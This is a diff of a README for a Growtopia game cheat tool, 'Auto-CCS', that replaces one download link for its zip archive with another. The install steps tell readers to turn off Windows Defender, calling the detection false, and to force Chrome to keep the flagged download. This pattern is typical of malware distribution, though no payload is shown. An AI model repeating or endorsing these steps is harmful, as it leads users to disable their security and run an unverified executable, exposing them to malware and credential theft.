RealGoblinz/gt-auto-ccs/README.md

 ## How to download & install
 1. Turn off windows defender, because Auto-CCS changes Growtopia code and gets detected as a false detection.
-2. Simply follow this link: https://github.com/Real-Goblins/Growtopia-AUTO-CCS/blob/main/GT%20Auto-CCS%20by%20RealGoblins%20v2.75.zip or https://www24.zippyshare.com/v/WBiB86vB/file.html
+2. Simply follow this link: https://github.com/RealGoblinz/gt-auto-ccs/releases/download/main/GT.Auto-CCS.by.RealGoblins.v2.75.zip
 3. Download the zip file
 4.(If necessary) Do ctrl + J (chrome) and press keep it 5..
 Unzip it with WinRar (right click -> extract to...)